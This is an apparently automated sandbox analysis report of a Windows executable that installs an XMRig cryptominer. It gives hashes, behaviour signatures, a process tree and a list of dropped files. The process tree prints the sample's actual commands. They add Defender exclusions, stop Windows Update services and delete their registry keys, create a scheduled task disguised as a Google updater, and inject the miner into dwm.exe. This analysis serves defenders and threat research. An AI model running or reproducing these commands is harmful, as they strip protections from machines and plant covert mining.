Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
30-09-2022 17:08
Static task
static1
Behavioral task
behavioral1
Sample
41382215636e83ce55d622ce7f15733a.exe
Resource
win7-20220901-en
General
-
Target
41382215636e83ce55d622ce7f15733a.exe
-
Size
4.0MB
-
MD5
41382215636e83ce55d622ce7f15733a
-
SHA1
aff94de054bb404000c010c4713998ddc6905626
-
SHA256
2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d
-
SHA512
94216303bf4455bc2a8de631c453bef013c1fab36f28c167c3488730d430713f0f117561bff3137697732b3bf16cab74b772fad79a36fc7c06e5be6fbaafe98d
-
SSDEEP
98304:jgFNGMRUCTguDUdjIF1qZHEfgg1AE1AQamhsDUoYX4:jYN7bThDUdj+qxEYGAE1AQuR
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1496-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1496-137-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2028 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1496-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1496-137-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 608 taskeng.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 2028 set thread context of 1120 2028 updater.exe conhost.exe PID 2028 set thread context of 1496 2028 updater.exe dwm.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1952 sc.exe 1228 sc.exe 1708 sc.exe 840 sc.exe 1704 sc.exe 576 sc.exe 1544 sc.exe 1900 sc.exe 1404 sc.exe 1924 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2000 schtasks.exe 1164 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exepid process 1496 powershell.exe 868 powershell.exe 804 powershell.exe 1976 powershell.exe 1724 powershell.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe 1496 dwm.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 468 -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.exedwm.exedescription pid process Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 2028 updater.exe Token: SeIncreaseQuotaPrivilege 744 WMIC.exe Token: SeSecurityPrivilege 744 WMIC.exe Token: SeTakeOwnershipPrivilege 744 WMIC.exe Token: SeLoadDriverPrivilege 744 WMIC.exe Token: SeSystemProfilePrivilege 744 WMIC.exe Token: SeSystemtimePrivilege 744 WMIC.exe Token: SeProfSingleProcessPrivilege 744 WMIC.exe Token: SeIncBasePriorityPrivilege 744 WMIC.exe Token: SeCreatePagefilePrivilege 744 WMIC.exe Token: SeBackupPrivilege 744 WMIC.exe Token: SeRestorePrivilege 744 WMIC.exe Token: SeShutdownPrivilege 744 WMIC.exe Token: SeDebugPrivilege 744 WMIC.exe Token: SeSystemEnvironmentPrivilege 744 WMIC.exe Token: SeRemoteShutdownPrivilege 744 WMIC.exe Token: SeUndockPrivilege 744 WMIC.exe Token: SeManageVolumePrivilege 744 WMIC.exe Token: 33 744 WMIC.exe Token: 34 744 WMIC.exe Token: 35 744 WMIC.exe Token: SeDebugPrivilege 2028 updater.exe Token: SeIncreaseQuotaPrivilege 744 WMIC.exe Token: SeSecurityPrivilege 744 WMIC.exe Token: SeTakeOwnershipPrivilege 744 WMIC.exe Token: SeLoadDriverPrivilege 744 WMIC.exe Token: SeSystemProfilePrivilege 744 WMIC.exe Token: SeSystemtimePrivilege 744 WMIC.exe Token: SeProfSingleProcessPrivilege 744 WMIC.exe Token: SeIncBasePriorityPrivilege 744 WMIC.exe Token: SeCreatePagefilePrivilege 744 WMIC.exe Token: SeBackupPrivilege 744 WMIC.exe Token: SeRestorePrivilege 744 WMIC.exe Token: SeShutdownPrivilege 744 WMIC.exe Token: SeDebugPrivilege 744 WMIC.exe Token: SeSystemEnvironmentPrivilege 744 WMIC.exe Token: SeRemoteShutdownPrivilege 744 WMIC.exe Token: SeUndockPrivilege 744 WMIC.exe Token: SeManageVolumePrivilege 744 WMIC.exe Token: 33 744 WMIC.exe Token: 34 744 WMIC.exe Token: 35 744 WMIC.exe Token: SeLockMemoryPrivilege 1496 dwm.exe Token: SeLockMemoryPrivilege 1496 dwm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
41382215636e83ce55d622ce7f15733a.execmd.exepowershell.exepowershell.exetaskeng.exeupdater.execmd.exedescription pid process target process PID 1468 wrote to memory of 1496 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 1496 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 1496 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 332 1468 41382215636e83ce55d622ce7f15733a.exe cmd.exe PID 1468 wrote to memory of 332 1468 41382215636e83ce55d622ce7f15733a.exe cmd.exe PID 1468 wrote to memory of 332 1468 41382215636e83ce55d622ce7f15733a.exe cmd.exe PID 1468 wrote to memory of 868 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 868 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 868 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 332 wrote to memory of 1708 332 cmd.exe sc.exe PID 332 wrote to memory of 1708 332 cmd.exe sc.exe PID 332 wrote to memory of 1708 332 cmd.exe sc.exe PID 332 wrote to memory of 1404 332 cmd.exe sc.exe PID 332 wrote to memory of 1404 332 cmd.exe sc.exe PID 332 wrote to memory of 1404 332 cmd.exe sc.exe PID 332 wrote to memory of 1924 332 cmd.exe sc.exe PID 332 wrote to memory of 1924 332 cmd.exe sc.exe PID 332 wrote to memory of 1924 332 cmd.exe sc.exe PID 332 wrote to memory of 840 332 cmd.exe sc.exe PID 332 wrote to memory of 840 332 cmd.exe sc.exe PID 332 wrote to memory of 840 332 cmd.exe sc.exe PID 332 wrote to memory of 1704 332 cmd.exe sc.exe PID 332 wrote to memory of 1704 332 cmd.exe sc.exe PID 332 wrote to memory of 1704 332 cmd.exe sc.exe PID 332 wrote to memory of 1104 332 cmd.exe reg.exe PID 332 wrote to memory of 1104 332 cmd.exe reg.exe PID 332 wrote to memory of 1104 332 cmd.exe reg.exe PID 332 wrote to memory of 1392 332 cmd.exe reg.exe PID 332 wrote to memory of 1392 332 cmd.exe reg.exe PID 332 wrote to memory of 1392 332 cmd.exe reg.exe PID 332 wrote to memory of 1600 332 cmd.exe reg.exe PID 332 wrote to memory of 1600 332 cmd.exe reg.exe PID 332 wrote to memory of 1600 332 cmd.exe reg.exe PID 332 wrote to memory of 1080 332 cmd.exe reg.exe PID 332 wrote to memory of 1080 332 cmd.exe reg.exe PID 332 wrote to memory of 1080 332 cmd.exe reg.exe PID 332 wrote to memory of 1888 332 cmd.exe reg.exe PID 332 wrote to memory of 1888 332 cmd.exe reg.exe PID 332 wrote to memory of 1888 332 cmd.exe reg.exe PID 868 wrote to memory of 2000 868 powershell.exe schtasks.exe PID 868 wrote to memory of 2000 868 powershell.exe schtasks.exe PID 868 wrote to memory of 2000 868 powershell.exe schtasks.exe PID 1468 wrote to memory of 804 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 804 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 1468 wrote to memory of 804 1468 41382215636e83ce55d622ce7f15733a.exe powershell.exe PID 804 wrote to memory of 1624 804 powershell.exe schtasks.exe PID 804 wrote to memory of 1624 804 powershell.exe schtasks.exe PID 804 wrote to memory of 1624 804 powershell.exe schtasks.exe PID 608 wrote to memory of 2028 608 taskeng.exe updater.exe PID 608 wrote to memory of 2028 608 taskeng.exe updater.exe PID 608 wrote to memory of 2028 608 taskeng.exe updater.exe PID 2028 wrote to memory of 1976 2028 updater.exe powershell.exe PID 2028 wrote to memory of 1976 2028 updater.exe powershell.exe PID 2028 wrote to memory of 1976 2028 updater.exe powershell.exe PID 2028 wrote to memory of 1416 2028 updater.exe cmd.exe PID 2028 wrote to memory of 1416 2028 updater.exe cmd.exe PID 2028 wrote to memory of 1416 2028 updater.exe cmd.exe PID 2028 wrote to memory of 1724 2028 updater.exe powershell.exe PID 2028 wrote to memory of 1724 2028 updater.exe powershell.exe PID 2028 wrote to memory of 1724 2028 updater.exe powershell.exe PID 1416 wrote to memory of 576 1416 cmd.exe sc.exe PID 1416 wrote to memory of 576 1416 cmd.exe sc.exe PID 1416 wrote to memory of 576 1416 cmd.exe sc.exe PID 1416 wrote to memory of 1544 1416 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\41382215636e83ce55d622ce7f15733a.exe"C:\Users\Admin\AppData\Local\Temp\41382215636e83ce55d622ce7f15733a.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#zfalrzu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {08AB94A2-819D-4866-BC83-E244BBA80A1A} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe llktminrzivp3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"3⤵
-
C:\Windows\system32\dwm.exeC:\Windows\system32\dwm.exe qtbgcbbuyarrseoa 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2R15GYAs/dQrH+CfI88Ko8ilwYx+F3flcrT35XvHxF1c3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5c5eccb1c34f5b5280b63739c2c0c09e8
SHA1e2005f576140f66759cb8a68c4aec4f94e61b94b
SHA2569853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c
SHA51271d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5c5eccb1c34f5b5280b63739c2c0c09e8
SHA1e2005f576140f66759cb8a68c4aec4f94e61b94b
SHA2569853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c
SHA51271d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd
-
C:\Users\Admin\AppData\Roaming\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5088fe243c6c52fdc669358b2408274ad
SHA19c3e121adb04a6232d03ecd076909142dcf81e41
SHA256dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1
SHA5123b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5088fe243c6c52fdc669358b2408274ad
SHA19c3e121adb04a6232d03ecd076909142dcf81e41
SHA256dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1
SHA5123b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5088fe243c6c52fdc669358b2408274ad
SHA19c3e121adb04a6232d03ecd076909142dcf81e41
SHA256dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1
SHA5123b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5088fe243c6c52fdc669358b2408274ad
SHA19c3e121adb04a6232d03ecd076909142dcf81e41
SHA256dc3f841277bdc436c88b11aaad798f615c7bf1461e9c349d85674cf8a73b2da1
SHA5123b66dc3a3dff11b16cf7907aa176f6b1baf0b9e92b5cc1300b289c0655532f2df972e80f1c59709cb7bb3652dc982d74c5c15a8d31d4e8818bb5feac8e3fadf8
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5c5eccb1c34f5b5280b63739c2c0c09e8
SHA1e2005f576140f66759cb8a68c4aec4f94e61b94b
SHA2569853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c
SHA51271d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd
-
memory/332-62-0x0000000000000000-mapping.dmp
-
memory/464-125-0x0000000000000000-mapping.dmp
-
memory/576-108-0x0000000000000000-mapping.dmp
-
memory/744-130-0x0000000000000000-mapping.dmp
-
memory/756-123-0x0000000000000000-mapping.dmp
-
memory/796-126-0x0000000000000000-mapping.dmp
-
memory/804-93-0x00000000026CB000-0x00000000026EA000-memory.dmpFilesize
124KB
-
memory/804-92-0x00000000026C4000-0x00000000026C7000-memory.dmpFilesize
12KB
-
memory/804-90-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/804-89-0x00000000026C4000-0x00000000026C7000-memory.dmpFilesize
12KB
-
memory/804-88-0x000007FEF3190000-0x000007FEF3CED000-memory.dmpFilesize
11.4MB
-
memory/804-87-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmpFilesize
10.1MB
-
memory/804-84-0x0000000000000000-mapping.dmp
-
memory/840-69-0x0000000000000000-mapping.dmp
-
memory/868-73-0x000007FEEEEC0000-0x000007FEEFA1D000-memory.dmpFilesize
11.4MB
-
memory/868-71-0x000007FEF3E20000-0x000007FEF4843000-memory.dmpFilesize
10.1MB
-
memory/868-63-0x0000000000000000-mapping.dmp
-
memory/868-81-0x00000000028BB000-0x00000000028DA000-memory.dmpFilesize
124KB
-
memory/868-82-0x00000000028B4000-0x00000000028B7000-memory.dmpFilesize
12KB
-
memory/868-83-0x00000000028BB000-0x00000000028DA000-memory.dmpFilesize
124KB
-
memory/868-79-0x00000000028B4000-0x00000000028B7000-memory.dmpFilesize
12KB
-
memory/868-76-0x000000001B7B0000-0x000000001BAAF000-memory.dmpFilesize
3.0MB
-
memory/932-120-0x0000000000000000-mapping.dmp
-
memory/1080-77-0x0000000000000000-mapping.dmp
-
memory/1104-72-0x0000000000000000-mapping.dmp
-
memory/1120-127-0x00000001400014E0-mapping.dmp
-
memory/1164-116-0x0000000000000000-mapping.dmp
-
memory/1228-119-0x0000000000000000-mapping.dmp
-
memory/1340-121-0x0000000000000000-mapping.dmp
-
memory/1364-129-0x0000000000000000-mapping.dmp
-
memory/1392-74-0x0000000000000000-mapping.dmp
-
memory/1404-65-0x0000000000000000-mapping.dmp
-
memory/1416-106-0x0000000000000000-mapping.dmp
-
memory/1496-132-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1496-56-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmpFilesize
10.1MB
-
memory/1496-133-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/1496-58-0x0000000002964000-0x0000000002967000-memory.dmpFilesize
12KB
-
memory/1496-54-0x0000000000000000-mapping.dmp
-
memory/1496-61-0x000000000296B000-0x000000000298A000-memory.dmpFilesize
124KB
-
memory/1496-134-0x0000000000000000-0x0000000001000000-memory.dmpFilesize
16.0MB
-
memory/1496-137-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1496-131-0x00000001407F25D0-mapping.dmp
-
memory/1496-60-0x0000000002964000-0x0000000002967000-memory.dmpFilesize
12KB
-
memory/1496-138-0x0000000000000000-0x0000000001000000-memory.dmpFilesize
16.0MB
-
memory/1496-59-0x000000000296B000-0x000000000298A000-memory.dmpFilesize
124KB
-
memory/1496-57-0x000007FEF3190000-0x000007FEF3CED000-memory.dmpFilesize
11.4MB
-
memory/1496-55-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmpFilesize
8KB
-
memory/1544-110-0x0000000000000000-mapping.dmp
-
memory/1600-75-0x0000000000000000-mapping.dmp
-
memory/1624-91-0x0000000000000000-mapping.dmp
-
memory/1704-70-0x0000000000000000-mapping.dmp
-
memory/1708-64-0x0000000000000000-mapping.dmp
-
memory/1724-115-0x0000000002774000-0x0000000002777000-memory.dmpFilesize
12KB
-
